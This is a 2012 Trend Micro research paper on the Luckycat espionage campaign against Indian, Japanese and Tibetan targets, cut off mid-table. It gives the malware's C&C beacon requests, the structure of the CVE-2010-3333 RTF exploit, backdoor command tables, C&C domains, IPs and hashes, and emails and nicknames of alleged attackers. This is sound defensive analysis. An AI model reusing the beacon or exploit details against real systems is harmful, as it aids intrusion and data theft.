##### Trend Micro Research Paper 2012 LUCKYCAT REDUX # Inside an APT Campaign with Multiple Targets in India and Japan ###### By: Forward-Looking Threat Research Team ----- #### CONTENTS Introduction..................................................................................... 1 Attribution.......................................................................................11 Diversity of Targets................................................................. 1 Campaign Connections................................................................12 Diversity of Malware.............................................................. 2 ShadowNet..............................................................................12 Diversity of Infrastructure.................................................... 2 Duojeen....................................................................................13 Operations............................................................................... 2 Sparksrv..................................................................................15 Attribution............................................................................... 2 Comfoo.....................................................................................16 Luckycat........................................................................................... 3 Conclusion......................................................................................19 Examples of Luckycat Attacks.............................................4 Defending Against APTs..............................................................19 Example 1: Japan.............................................................4 Local and External Threat Intelligence ...........................19 Example 2: India..............................................................4 Mitigation and Cleanup Strategy......................................20 Example 3: Tibet..............................................................5 Educating Employees Against Social Engineering.......20 Vulnerabilities and Malware Samples.......................................5 Data-Centric Protection Strategy.....................................20 Campaign Codes............................................................................ 7 Trend Micro Threat Protection Against Luckycat Command and Control..................................................................8 Campaign Components...............................................................21 Operations.......................................................................................9 ----- #### INTRODUCTION The number of targeted attacks has dramatically Cyber-espionage campaigns often focus on specific increased. Unlike largely indiscriminate attacks that focus industries or communities of interest in addition to a on stealing credit card and banking information associated geographic focus. Different positions of visibility often with cybercrime, targeted attacks noticeably differ and yield additional sets of targets pursued by the same threat are better characterized as “cyber espionage.” Highly actors. We have been tracking the campaign dubbed targeted attacks are computer intrusions threat actors “Luckycat” and found that in addition to targeting Indian stage in order to aggressively pursue and compromise military research institutions, as previously revealed by specific targets, often leveraging social engineering, in Symantec, the same campaign targeted entities in Japan order to maintain persistent presence within the victim’s as well as the Tibetan community.[3] network so they can move laterally and extract sensitive information.[1] The Luckycat campaign targeted the following industries and/or communities: In a typical targeted attack, a target receives a contextually relevant email that encourages a potential - Aerospace - Shipping victim to click a link or open a file.[2] The links and files the attackers send contain malicious code that exploits - Energy - Military research vulnerabilities in popular software. The exploits’ payload is a malware that is silently executed on the target’s - Engineering - Tibetan activists computer. This exploitation allows the attackers to take control of and obtain data from the compromised The Luckycat campaign attacked a diverse set of targets computer. In other cases, the attackers send disguised using a variety of malware, some of which have been executable files, usually compressed in archives that, linked to other cyber-espionage campaigns. The attackers if opened, also compromise the target’s computer. The behind this campaign maintain a diverse set of C&C malware connects back to command-and-control (C&C) infrastructure and leverages anonymity tools to obfuscate servers under the attackers’ control from which they their operations. We were able to track elements of this can command the compromised computer to download campaign to hackers based in China. additional malware and tools that allow them to move laterally throughout the target’s network. These attacks ##### Diversity of Targets are, however, not isolated “smash-and-grab” incidents but are part of consistent campaigns that aim to establish covert presence in a target’s network so that information The Luckycat campaign, which has been active since at can be extracted as needed. least June 2011, has been linked to 90 attacks against targets in Japan and India as well as Tibetan activists. Targeted attacks are rarely isolated events. In fact, Each malware attack involves a unique campaign code that they are constant. It is more useful to think of them as can be used to track which victims were compromised by campaigns—a series of failed and successful attempts which malware attack. This illustrates that the attackers to compromise a target’s network over a certain period are both very aggressive and continually target their of time. The attackers, in fact, often keep track of the intended victims. These are not smash-and-grab attacks different attacks within a campaign in order to determine but constitute a “campaign” comprising a series of which individual attack compromised a specific victim’s ongoing attacks over time. In sum, the Luckycat campaign network. As the attackers learn more about their targets managed to compromise 233 computers.[4] from open source research—relying on publicly available information, as well as previous attacks, the specificity of the attacks may sharply increase. 1 [http://www.trendmicro.com/cloud-content/us/pdfs/security-](http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp_trends-in-targeted-attacks.pdf) [3 http://www.symantec.com/content/en/us/enterprise/media/security_](http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the_luckycat_hackers.pdf) [intelligence/white-papers/wp_trends-in-targeted-attacks.pdf](http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp_trends-in-targeted-attacks.pdf) [response/whitepapers/the_luckycat_hackers.pdf](http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the_luckycat_hackers.pdf) ----- ##### Diversity of Malware Operations We were able to identify five malware families either TROJ_WIMMIE, favored by the Luckycat attackers, bundles utilized by or hosted on the same dedicated server the a significant amount of information on the victim and Luckycat campaign uses. Some were used as second- uploads it to a C&C server. One such file recovered from stage malware that the attackers pushed to victims whose a C&C server is actually the result of a test run by the networks were compromised by first-stage malware. attackers. The information reveals that the attackers use Second-stage malware typically provide additional proxy and anonymity tools to shield their identities as functionality and are especially used if the first-stage well as a variety of mailing programs to instigate targeted malware prove very simplistic. In addition, we found that attacks. In addition, the language settings of the attackers’ the attackers used multiple malware families that coincide computers indicate that they are Chinese speakers. This is with malware that have been used in other campaigns. consistent with the information Symantec obtained, which This indicates a level of collaboration across campaigns. shows that the attackers logged in to their C&C server from IP addresses allocated to China. ##### Diversity of Infrastructure Attribution The Luckycat campaign use free web-hosting services that provide a diversity of domain names as well as IP Using open source research, we were able to connect addresses. This distributes the campaign, making it more the email address used to register one of the Luckycat difficult to track. However, the attackers also made use C&C servers to a hacker in the Chinese underground of Virtual Private Servers (VPSs) that not only housed community. He uses the nickname, “dang0102,” and has their primary malware—TROJ_WIMMIE, but others as well.[5] published posts in the famous hacker forum, XFocus, These servers may also act as anchors, as servers on free as well as recruited others to join a research project on hosting services are shut down for malicious activity. As a network attack and defense at the Information Security result, the campaign stabilized its infrastructure over time, Institute of the Sichuan University. The hacker, also known transferring victims, often through the use of second- as “scuhkr,” has authored articles related to backdoors and stage malware, from free hosting servers to their stable shellcode in a hacking magazine. core of VPSs. ----- #### LUCKYCAT The malware used in the Luckycat campaign, detected by The attacker then creates a file with a name that ends in Trend Micro as TROJ_WIMMIE[6] or VBS_WIMMIE,[7] connects _@.c, which contains a command._ to a C&C server via HTTP over port 80. It is notable because it uses Windows Management Instrumentation [HOSTNAME]_[MAC_ADDRESS]_[CAMPAIGN_ _(WMI)[8]_ to establish persistence.[9] VBS_WIMMIE registers a CODE]@.c script that works as a backdoor to the WMI event handler The compromised computer then downloads the file and and deletes files associated with it or TROJ_WIMMIE. As executes the specified command, which may include any a result, the backdoor cannot be detected by antivirus of the following: software through simple file scanning. - Get external IP address - Download file The compromised computer posts data to a PHP script that runs on the C&C server, usually count.php. - Execute shell command - Upload file POST/count/count.php?m=c&n=[HOSTNAME]_ [MAC_ADDRESS]_[CAMPAIGN_CODE]@HTTP/1.0 The compromised computer then sends the output to the Accept: */* C&C server and deletes the command file: UA-CPU: x86 User-Agent: Mozilla/4.0 (compatible; MSIE POST/count/count.php?m=w&n=[HOST_NAME]_ 7.0; Windows NT 5.1; .NET CLR 2.0.50727; [MAC_ADDRESS]_[CAMPAIGN_CODE]@@.t HTTP/1.0 .NET CLR 3.0.4506.2152; .NET CLR POST/count/count.php?m=d&n=[HOST_NAME]_ 3.5.30729) [MAC_ADDRESS]_[CAMPAIGN_CODE]@@.c HTTP/1.0 Host: [HOSTNAME] Content-Length: 0 One of the common initial commands instructs the Connection: Keep-Alive compromised computer to upload the results of Pragma: no-cache information-gathering commands. This command causes the compromised computer to create a directory listing The initial communication results in the creation of a of the available drives, along with the output of the file on the C&C server that contains information on the commands, “ipconfig,” “tasklist,” and “systeminfo.” The compromised computer. Although the file is empty, the resulting files are compressed using the CAB compression file name contains the hostname of the compromised format and uploaded to the C&C server. This provides the computer, followed by its MAC address, along with the attackers a full set of information to evaluate the nature of campaign code the attackers use to identify which the compromised computer. malware attack caused the compromise: ~[HOSTNAME]_[MAC_ADDRESS]_[CAMPAIGN_CODE] [6 http://about-threats.trendmicro.com/Malware.](http://about-threats.trendmicro.com/Malware.aspx?language=us&name=TROJ_WIMMIE.C) [aspx?language=us&name=TROJ_WIMMIE.C](http://about-threats.trendmicro.com/Malware.aspx?language=us&name=TROJ_WIMMIE.C) [7 http://about-threats.trendmicro.com/malware.](http://about-threats.trendmicro.com/malware.aspx?language=us&name=VBS_WIMMIE.C) [aspx?language=us&name=VBS_WIMMIE.C](http://about-threats.trendmicro.com/malware.aspx?language=us&name=VBS_WIMMIE.C) 8 The Luckycat malware may be notable but its technique is no longer new, as the WMI malware featured in the paper cited below also exhibited the same capability. ----- ##### Examples of Luckycat Attacks ###### Example 1: Japan Example 2: India _Figure 1: Decoy document opened after exploiting an Adobe_ Reader vulnerability A targeted email was sent to some organizations in Japan. One of the attacks occurred during the confusion after _Figure 2: Redacted decoy document opened after exploiting a_ Microsoft Word vulnerability the Great East Japan Earthquake and the Fukushima Nuclear Power Plant accident. The attackers used the A malicious document containing information on India’s disaster to lure potential victims into opening a malicious ballistic missile defense program was used to lure potential .PDF attachment. The .PDF file exploited a vulnerability victims into opening it. This document contains malicious in Adobe Reader—CVE-2010-2883, in order to drop code that exploits a vulnerability in Microsoft Office—CVE- TROJ_WIMMIE onto the target’s system.[10] This malware _2010-3333, to drop TROJ_WIMMIE onto a compromised_ communicated with a Luckycat C&C server. The decoy system so this would connect to a C&C server the Luckycat document contains the radiation dose measurement hackers operate.[12] results, which were published on the Tokyo Power Electric Company (TEPCO) website.[11] ----- #### VULNERABILITIES AND MALWARE SAMPLES ###### Example 3: Tibet Most of the samples we have seen exploited CVE-2010- _3333. Dubbed the “Rich Text Format (RTF) Stack Buffer_ Overflow Vulnerability,” this causes a buffer overflow in the Microsoft Word RTF parser when the “pFragments” shape property is given a malformed value. To verify the exploitation, one should look out for the following keywords: - pFragments: Seen after the string, “\sn” - \sv: Exploit code is seen after this The typical structure of the malicious RTF document is: {\rtf1{\shp{\sp{\sn pFragments}{\sv _Figure 3: Decoy document opened after exploiting a Microsoft_ “exploit code”}}}} Office vulnerability The rest of the samples we found exploited the following Malicious emails and .DOC attachments that leverage vulnerabilities in Adobe Reader and Flash Player: Tibetan themes in order to trick recipients into opening them have been found. This particular sample exploits the _•_ _CVE-2010-2883: Adobe Reader TTF SING table_ same vulnerability in Microsoft Office—CVE-2010-3333, to parsing vulnerability drop TROJ_WIMMIE onto the target’s system so it would communicate back to a C&C server the Luckycat hackers _•_ _CVE-2010-3654: Adobe Flash Player AVM2 multi-name_ operate. button class vulnerability[13] _•_ _CVE-2011-0611: Adobe Flash Player AVM1 shared object_ type vulnerability[14] _•_ _CVE-2011-2462: Adobe Reader U3D component_ vulnerability[15] [13 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3654](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3654) ----- |MD5|CVE Identifier|Campaign Code| |---|---|---| |dab3f591b37f5147ae92570323b5c47d|CVE-2010-3333|w1229| |c023544af85edacc66cd577a0d665dec|CVE-2010-3333|w1229| |cff0964ed2df5659b0a563f32b7c3eca|CVE-2010-3333|214| |3deb2a5fcb6bf1f80a074fd351e6f620|CVE-2010-3333|2012| |1aa1e795a5ba75f2a5862c6d01205b57|CVE-2010-2883 CVE-2010-3654 CVE-2011-0611|110824p| |6a62d4532c7a0656381fee8fb51874d7|CVE-2010-2883 CVE-2010-3654 CVE-2011-0611|longjiao| |cb9ab22f3356a3b054a7e9282a69f71e|CVE-2011-2462|gop| |1dafdc9e507771d0d8887348ce3f1c52|CVE-2010-3333|gop| |039a6e012f33495a1308b815ef098459|CVE-2010-3333|luck| |be0b2e7a53b1dcacb8c54c180dc4ca27|CVE-2010-2883 CVE-2010-3654 CVE-2011-0611|11727p| |00f07b0e701dcfa49e1c907f9242d028|CVE-2010-2883 CVE-2010-3654 CVE-2011-0611|110705hktq| |411ab5eb2ef3153b61a49964f9ab4e64|CVE-2011-2462|1229| |dcac508495d9800e476aa0c8e11b748d|CVE-2010-3333|2012| |00e686e382806c33d9ae77256f33ed93|Not applicable|LY| MD5 CVE Identifier Campaign Code dab3f591b37f5147ae92570323b5c47d _CVE-2010-3333_ w1229 c023544af85edacc66cd577a0d665dec _CVE-2010-3333_ w1229 cff0964ed2df5659b0a563f32b7c3eca _CVE-2010-3333_ 214 3deb2a5fcb6bf1f80a074fd351e6f620 _CVE-2010-3333_ 2012 1aa1e795a5ba75f2a5862c6d01205b57 _CVE-2010-2883_ 110824p _CVE-2010-3654_ _CVE-2011-0611_ 6a62d4532c7a0656381fee8fb51874d7 _CVE-2010-2883_ longjiao _CVE-2010-3654_ _CVE-2011-0611_ cb9ab22f3356a3b054a7e9282a69f71e _CVE-2011-2462_ gop 1dafdc9e507771d0d8887348ce3f1c52 _CVE-2010-3333_ gop 039a6e012f33495a1308b815ef098459 _CVE-2010-3333_ luck be0b2e7a53b1dcacb8c54c180dc4ca27 _CVE-2010-2883_ 11727p _CVE-2010-3654_ _CVE-2011-0611_ 00f07b0e701dcfa49e1c907f9242d028 _CVE-2010-2883_ 110705hktq _CVE-2010-3654_ _CVE-2011-0611_ 411ab5eb2ef3153b61a49964f9ab4e64 _CVE-2011-2462_ 1229 dcac508495d9800e476aa0c8e11b748d _CVE-2010-3333_ 2012 00e686e382806c33d9ae77256f33ed93 Not applicable LY _Table 1: Luckycat malware samples sorted by exploit and campaign code_ ----- #### CAMPAIGN CODES Each malware attack involves a unique campaign code that - 110714jdap - 64sc109pfye can be used to track which systems were compromised by which attack. The campaign codes often contain dates that - 110714tp - 64sc239pf9010 indicate when each malware attack was launched. This demonstrates how actively and frequently the attackers - 110715x - 720halheli launched attacks. The campaign codes also reveal the attackers’ intent, as some of these referenced the intended - 110718p - 729ggggsenior targets. The following lists the campaign codes we discovered: - 110816h - 919ggggstp - 0607e - 1090silver89 - 110824p - ggggstpdomainserver - 0609af - 110228cl - 1108navyeast - dang279wrdye - 0613deliinfo - 110311cl - 1108vpsecretary - god - 0613f - 110315cl - 111031pp - gop - 0614senior - 110315 - 1110mea - ishan99dfp - 0616itiT8 - 110321cl - 1114round - j1141ap99 - 0706gggg - 110329 - 1122bol - j4611dq9 - 0804ggggdatanet1 - 110504 - 1122gmail - kondulgml27pfye - 0805ggggetp - 110603p89 - 1122other - longjiao - 0805ggggstp - 110606rg789 - 11421is9 - luck - 0805ecil - 110616np - 1145j9yb - LY - 0805gggg - 110705hktq - 1147s9 - nec3rd79dfp - 0818ICG - 110706gggg - 1148dq8 - nfounrsvan99uc - 0823ggggARDE - 110706hal - 11614lmpn - nne - 0824ggg - 110705hktq - 11725imp - ongs239pfye - 0826ggggtnd - 110708hktqw - 11727p - sai - 1017navydiwali - 110711gggg - 1229 - stmlsp211wd - 1017ggg - 110711hal - 2012 - w1229 - 1025gggCSC - 110711xzg - 214 - wwwroot - 1025 SC - 110713jp ----- |Domain|Email Address| |---|---| |clbest.greenglassint.net|19013788@qq.com| |bailianlan.c.dwyu.com|dayinok@qq.com| |duojee.info|duojeewei@qq.com| |Domain|Email Address| |---|---| |cattree.1x.biz|lindagreen56@rediffmail.com| |charlesbrain.shop.co|yamagami_2011@mail.goo. ne.jp| |footballworldcup.website.org|ajayalpna@hotmail.com| |frankwhales.shop.co|yamagami_2011@mail.goo. ne.jp| |hi21222325.x.gg|hi2122325@hotmail.com| |kinkeechow.shop.co|kinkee_chow@mail.goo.ne.jp| |kittyshop.kilu.org|pbdelhioffice@gmail.com| |perfect.shop.co|dsang72@yahoo.com| |pumasports.website.org|ranjitrai123@hotmail.com| |tomsburs.shop.co|yamagami_2011@mail.goo. ne.jp| |vpoasport.shopping2000.com|beenznair@gmail.com| |goodwell.all.co.uk|paltry.parrot@googlemail.com| |fireequipment.website.org|shrivastava.agrim@gmail.com| |tennissport.website.org|manindramohanshukla@ yahoo.com| |waterpool.website.org|jaganacharya@hotmail.com| |tb123.xoomsite.com|| |tbda123.gwchost.com|| |toms.0fees.net|| |tomygreen.0fees.net|| |killmannets.0fees.net|| |maritimemaster.kilu.org|| |masterchoice.shop.co|| |jeepvihecle.shop.co|| |lucysmith.0fees.net|| #### COMMAND AND CONTROL The Luckycat campaign extensively use free hosting The attackers also maintain servers that do not appear to services. We recorded the domains the attackers used as be from free web-hosting service providers. In fact, these well as the email addresses they utilized to register the appear to use dedicated VPS services. domains, if available. While the domains, including their suffixes, were considerably diverse, all were available Domain Email Address from three different free hosting services. As such, the attackers had nothing to lose but time in order to continue _clbest.greenglassint.net_ _19013788@qq.com_ creating diverse domain names for C&C servers. _bailianlan.c.dwyu.com_ _dayinok@qq.com_ _duojee.info_ _duojeewei@qq.com_ Domain Email Address _Table 3: C&C servers that the attackers hosted on VPSs_ _cattree.1x.biz_ _lindagreen56@rediffmail.com_ _charlesbrain.shop.co_ _yamagami_2011@mail.goo._ We also found advertisements for VPS services using two _ne.jp_ of the C&C server IP addresses in Table 3. While the VPS _footballworldcup.website.org_ _ajayalpna@hotmail.com_ services were advertised in Chinese forums, the servers _frankwhales.shop.co_ _yamagami_2011@mail.goo._ were actually hosted in the United States. _ne.jp_ _hi21222325.x.gg_ _hi2122325@hotmail.com_ _kinkeechow.shop.co_ _kinkee_chow@mail.goo.ne.jp_ _kittyshop.kilu.org_ _pbdelhioffice@gmail.com_ _perfect.shop.co_ _dsang72@yahoo.com_ _pumasports.website.org_ _ranjitrai123@hotmail.com_ _tomsburs.shop.co_ _yamagami_2011@mail.goo._ _ne.jp_ _vpoasport.shopping2000.com_ _beenznair@gmail.com_ _goodwell.all.co.uk_ _paltry.parrot@googlemail.com_ _Figure 4: Sample ads for the VPS services the attackers use_ _fireequipment.website.org_ _shrivastava.agrim@gmail.com_ _tennissport.website.org_ _manindramohanshukla@_ The diversity of C&C hosting services used provided _yahoo.com_ the attackers a resilient infrastructure. If one server, for _waterpool.website.org_ _jaganacharya@hotmail.com_ instance, was shut down for malicious activity, they can easily create more servers. As victims of interest are _tb123.xoomsite.com_ identified, they can also be easily moved from free hosting _tbda123.gwchost.com_ servers to C&C servers set up on more stable VPSs. The _toms.0fees.net_ domain and geographic diversity of the IP addresses also _tomygreen.0fees.net_ helped mask the attackers’ locations. _killmannets.0fees.net_ _maritimemaster.kilu.org_ _masterchoice.shop.co_ _jeepvihecle.shop.co_ _lucysmith.0fees.net_ _Table 2: Free web-hosting service domains the attackers used for_ _C&C servers_ ----- #### OPERATIONS The threat actors behind the Luckycat campaign tested one of their malware samples on a computer under their control. In the process, they uploaded down.cab, which contains a command that creates a directory listing of the available drives on a compromised system, along with the output of the commands, “ipconfig,” “tasklist,” and “systeminfo.” We were able to download this file from the C&C server. While it does not reveal the attackers’ identities, it does provide an inside view of their operations. The result of the “systeminfo” command indicates that the attackers tested the malware in a virtual environment. The environment was set up using a Chinese-language version of Windows XP. _Figure 6: Sample ads for the pirated Windows XP version used_ While the rest of the information we gathered did not reveal significant clues due to the use of a VM, we found that the attackers left a shared drive—D:\, which was indexed by the malware. The index was then uploaded to the C&C server. _Figure 5: Sample system information the attackers obtained after_ _testing on a virtual machine (VM)_ We found that the product ID of the Windows XP software used was posted online in the past. It was a pirated _Windows XP version that was made available for purchase_ in China. _Figure 7: Drive left available by the attackers that contains C&C_ _scripts and victim information_ ----- In one of the directories—ccclllmmmm, we found that the attackers put a copy of the count.php C&C backend as well as a list of the victims and the contents of their computers. We were also able to find that the C&C server the attackers used was a victim’s computer. _Figure 9: Anonymity tools the attackers had on the shared D:\_ _drive_ The attackers also had mailing software such as FoxMail and Supermailer on the shared D:\ drive. While these tools are not malicious, the attackers used these to easily send out socially engineered emails. These also allowed them to keep track of their various identities and email accounts. One of the samples we obtained used the Chinese- language version of FoxMail. _Figure 8: Victim information on the attackers’ C&C server that is_ _identical to the the information on the attackers’ shared D:\ drive_ The attackers clearly have operational procedures in place to obscure their true locations with the aid of anonymity To ensure operational security, the attackers installed Tor tools. They also have a virtualized environment set up to and Tunnelier. Some of the email samples with malware test and fine-tune their malware as well as the necessary attachments, in fact, sent through Yahoo! Mail used Tor. tools to maintain their various identities and send out The use of this anonymity tool allowed the attackers to socially engineered emails with malicious attachments. obscure their IP addresses, making it increasingly difficult for researchers to pinpoint their locations. ----- #### ATTRIBUTION Additional clues concerning the attackers had to with the email address, 19013788@qq.com, which was used to register one of the C&C servers, clbest.greenglassint. _net. This email address can be mapped to the QQ number,_ _19013788. QQ is popular instant-messaging (IM) software in_ China. This QQ number is linked to a hacker in the Chinese underground community who goes by the nickname, “dang0102,” and has published posts in the famous hacker forum, XFocus, in 2005. _Figure 10: Sample post by dang0102 using the QQ number,_ _Figure 11: Post by schuhkr using the QQ number, 19013788_ 19013788 The post in Figure 11 contains two email addresses— The same hacker also published a post on a student BBS ggggggsccd@sina.com and scuhkr@21cn.com, along of the Sichuan University using the nickname, “scuhkr,” with an additional QQ number, 2888111. The email address, in 2005. He wanted to recruit 2–4 students to a network _scuhkr@21cn.com, is also associated with an account on_ attack and defense research project at the Information _rootkit.com.[17]_ Investigating the second QQ number allowed Security Institute of the Sichuan University then. Scuhkr us to determine that scuhkr also used the nickname, also authored articles related to backdoors and shellcode “lolibaso.” The other individual mentioned in the post also in a hacking magazine that same year.[16] worked and studied at the Information Security Institute of the Sichuan University and has published several articles related to “fuzzing” vulnerabilities in 2006. ----- #### CAMPAIGN CONNECTIONS We were able to identify five malware families that were One of the sample email’s attachments was part of either used by or hosted on the same dedicated server the Luckycat campaign while the other was part of the with the domain name, duojee.info. Some of these were ShadowNet campaign. The ShadowNet campaign has used as second-stage malware that the attackers pushed a history of targeting Tibetan activists as well as the to victims whose systems have been compromised by first- Indian government, which fits the profile of the Luckycat stage malware. Second-stage malware typically provided campaigns as well. additional functionality and were especially used if the first-stage malware is very simplistic. We also found that the attackers used several malware families that have been utilized in previous campaigns. This may indicate a level of collaboration across campaigns. ##### ShadowNet The first interesting connection we noticed in conjunction with the Luckycat campaign had to do with ShadowNet, a cyber-espionage network documented by researchers at the University of Toronto and the ShadowServer Foundation.[18] We found a socially engineered email that had two malicious file attachments. _Figure 13: Relationship between the Luckycat and the ShadowNet_ _campaigns_ The ShadowNet malware, detected by Trend Micro as TROJ_GUPD.AB, first connects to a blog in order to receive the URL of the C&C server. The URL was encoded using a modulus operation. The malware on the compromised computer decodes the URL then issues a connection to the C&C server. The compromised computer posts data to a PHP script running on the server, usually named index. _php or all.php, and contains information about it as well as_ a campaign code. The information is stored in a .TXT file on the C&C server. The compromised computer continues to beacon to the C&C server to see if the operators have designed any commands. If they have, the compromised computer then executes the given commands and reports the results back to the C&C server. _Figure 12: Sample targeted email with both Luckycat and_ _ShadowNet malware attachments_ ----- |MD5|CVE Identifier|Campaign Code| |---|---|---| |26891c3e4a2de034e4841db2a579734f|CVE-2011-2462|circle| |ebea24fe1611a1ab778f5ecceb781fad|CVE-2010-3333|circle| _Figure 15: Example of a blog used by ShadowNet to communicate_ _an encoded C&C server location_ _Figure 14: Sample ShadowNet malware related to a Luckycat_ The blogs and groups the ShadowNet attackers use can _email attack_ be easily updated whenever the C&C servers are changed. The URL of the blog is embedded in the malware. The This attack used the theme of self-immolation in Tibet for malware connects to the blog and decodes the C&C URL both the email and the decoy document that is opened then connects to the C&C server. The commands the after the vulnerability exploitation. The malicious file server issues are also encoded using a simple logical attachment exploits a vulnerability in Microsoft Office— operator. The malware also decodes these using keycodes _CVE-2010-3333, to drop malware onto the target’s system._ that are sent along with the actual commands. The malware was configured to connect to two blogs and a _Yahoo! Group in order to find the C&C server’s location._ MD5 CVE Identifier Campaign Code 26891c3e4a2de034e4841db2a579734f _CVE-2011-2462_ circle ebea24fe1611a1ab778f5ecceb781fad _CVE-2010-3333_ circle _Table 4: ShadowNet malware samples related to the Luckycat campaign_ ##### Duojeen The malware attacks related to the Duojeen campaign all target the Tibetan community and use a single C&C server— _duojee.info. We also found that a malware binary available for download from duojee.info is a TROJ_WIMMIE Trojan that_ connects back to bailianlan.c.dwyu.com—a C&C server the Luckycat attackers use. ----- _Figure 16: Relationship between the Duojeen and the Luckycat campaigns_ The duojee.info server is the C&C component of the The Duojeen malware continues to poll the C&C server Duojeen campaign. The related malware, detected by then executes one of the only possible commands Trend Micro as BKDR_DUOJEEN.A, connects to a C&C specified by the attackers: server and posts data to a PHP script typically named, _linux.php, solaris.php, or freebsd.php. The following_ - Stop the malware from communicating with the C&C information is encoded using logical operators such as xor, server _or, or bitwise shifting on adjacent bytes in the malware:_ - Download and execute a second-stage malware - Hostname - Computer name - MAC address - IP address, subnet mask, and gateway - Network resources - Running processes _•_ _Microsoft Outlook user account information (e.g., HTTP_ _Figure 17: Sample Duojeen attack email_ mail user name, POP3 user name, or POP3 server) - Recently opened files ----- |MD5|CVE Identifier|Campaign Code| |---|---|---| |715cbbe21844bbb4f1f60a91ae28def3|CVE-2010-3333|aaaa| |a9bda3c31fc6acc83a5226226f7ab554|CVE-2010-3333|aaaa| |567a774cf865b50189e81c14b4ca4b63|CVE-2010-3333|aaaa| |e62c115b6874726c309b3038a9391e28|CVE-2010-3333|aaaa| |9860d087892fce98e6f639e3e9dba91e|Not applicable|aaa| |d773e3bacc2c8389c2ab51c9cbc68480|Not applicable|aaa| One of the Duojeen attacks leverages a Tibetan-themed job ad to encourage potential victims to open an attached document that exploits a vulnerability in Microsoft Office—CVE-2010-3333, in order to drop a malware that connects to _duojee.info._ MD5 CVE Identifier Campaign Code 715cbbe21844bbb4f1f60a91ae28def3 _CVE-2010-3333_ aaaa a9bda3c31fc6acc83a5226226f7ab554 _CVE-2010-3333_ aaaa 567a774cf865b50189e81c14b4ca4b63 _CVE-2010-3333_ aaaa e62c115b6874726c309b3038a9391e28 _CVE-2010-3333_ aaaa 9860d087892fce98e6f639e3e9dba91e Not applicable aaa d773e3bacc2c8389c2ab51c9cbc68480 Not applicable aaa _Table 5: Duojeen malware samples_ _Duojee.info also contains the PHP scripts used for_ commanding and controlling the Luckycat campaign at _/holly/count.php as well as ShadowNet at /soom/cont.php._ The duojee.info server also has a phishing page designed to steal passwords from mail.tibet.net users. _Figure 18: Phishing page hosted on duojee.info_ The duojee.info server also has other malware from two additional families available for download. One _Figure 19: Relationship between the Sparksrv and the Luckycat_ malware is known as “Comfoo,” related to yet another _campaigns_ cyber-espionage campaign, while the other is known as “Sparksrv.” The Sparksrv malware, detected by Trend Micro as BKDR_ RPKNUF.A, was initially found on a ShadowNet server in November 2011. We have, however, found several instances ##### Sparksrv of a newer version of the same malware on duojee. _info. The malware initially sends the following plain-text_ Sparksrv refers to a second-stage malware that provides information through port 443: backdoor access with significantly more functionality - IP address than first-stage droppers. Second-stage malware, often - Identifier Remote Administration Trojans (RATs), are deployed because first-stage malware only provide simple “check-in” - MAC address functionality such as a short list of commands that can be scheduled. Second-stage RATs, on the other hand, provide an additional access channel as well as “real-time” control over a compromised machine if the attackers and the victims are online at the same time. ----- |MD5|Domain|IP Address| |---|---|---| |0a927897ab5acff1e6bd45897368253b|fidk.rkntils.dnset.com|69.162.71.254| |b53f71e4dd2ca8826e6191dee439564b|fidk.rkntils.dnset.com|69.162.71.254| |a2b37776e0bd6594c688a8214371b9ff|rukiyeangel.dyndns.pro|199.192.152.100| |MD5|IP Address| |---|---| |d0eec59f1e74c0851c8dd1c8be88f2b9|173.208.242.25| Once the malware establishes a connection, it then starts to receive commands from the C&C server, which allow the attackers to do the following: - Start or kill a process - Create or delete directories - Copy or search for a file - Load a DLL - Download or upload files - Invoke a command shell MD5 Domain IP Address 0a927897ab5acff1e6bd45897368253b _fidk.rkntils.dnset.com_ _69.162.71.254_ b53f71e4dd2ca8826e6191dee439564b _fidk.rkntils.dnset.com_ _69.162.71.254_ a2b37776e0bd6594c688a8214371b9ff _rukiyeangel.dyndns.pro_ _199.192.152.100_ _Table 6: Sparksrv malware samples and C&C locations_ We also found an older version of the malware on a ShadowNet server, sunshine.shop.co. MD5 IP Address d0eec59f1e74c0851c8dd1c8be88f2b9 _173.208.242.25_ _Table 7: Older Sparksrv malware version found on a ShadowNet_ _server_ ##### Comfoo Comfoo malware have been seen in conjunction with campaigns targeting sensitive entities in both Japan and India. We found a version of the Comfoo malware on the _duojee.info server as well as an email attack that used the_ same version of Comfoo malware. In fact, the .DOC file used in the attack dropped an .EXE file with the same MD5 hash as the one found on the duojee.info server. _Figure 20: Relationship between the Comfoo and the Luckycat_ _campaigns_ ----- |Command|Description| |---|---| |0x233C|Invoke command shell| |0x1B6C|Take screenshot| |0x139C|Start interactive desktop| |0x1F54|Start keylogging| |0xFDC|Stop service| |0xFF0|Delete service| |0xBCC|Enumerate running processes| |0xBE0|Terminate process| |0x2EF4|Download file| While at least two of the Comfoo variants are essentially the same, the traffic encryption methods used in the Comfoo sample found in connection with duojee.info differed from other Comfoo variants we’ve analyzed that are not directly related to the Luckycat campaign. The more common Comfoo malware samples we analyzed used custom encryption methods while the variant found on the duojee.info server utilized the Windows Cryptographic _Application Programming Interface (API). This Comfoo_ variant’s initial network communication sent the following information to the C&C server: - Randomly generated characters - MAC address _Figure 21: Sample Comfoo campaign email_ - IP address This Comfoo email attack leverages the current situation in Tibet to encourage recipients to open a malicious - OS version attachment that exploits a vulnerability in Microsoft _Office—CVE-2010-3333, in order to drop a malware onto the_ - String, “liberate,” as campaign code target’s system. The attackers gather the following information from infected systems: - CPU, NETBIOS, and disk information - System, OS version, and account information - Network adapters, protocols, and configuration information - Installed applications as well as Internet Explorer (IE) and Browser Helper Object (BHO) information The malware the attackers use is capable of receiving several commands. Command Description _Figure 22: Comfoo decoy document that exploits a Microsoft_ 0x233C Invoke command shell Office vulnerability 0x1B6C Take screenshot After the decoy document opens, the Comfoo malware 0x139C Start interactive desktop begins to communicate with johnnees.rkntils.10dig.net, 0x1F54 Start keylogging which resolves to the IP address, 69.162.71.254—the same 0xFDC Stop service host that some Sparksrv malware samples we analyzed 0xFF0 Delete service use. 0xBCC Enumerate running processes 0xBE0 Terminate process 0x2EF4 Download file _Table 8: Commands the Comfoo malware receive_ ----- |MD5|CVE Identifier|Campaign Code| |---|---|---| |24552d599b650ca3ecd467d9d740de33|CVE-2010-3333|liberate| |6815ab1f11ac33d4c1149efc3206d794|Not applicable|liberate| |6bd4e7d7408e0d8d1592e27fc19650c8|Not 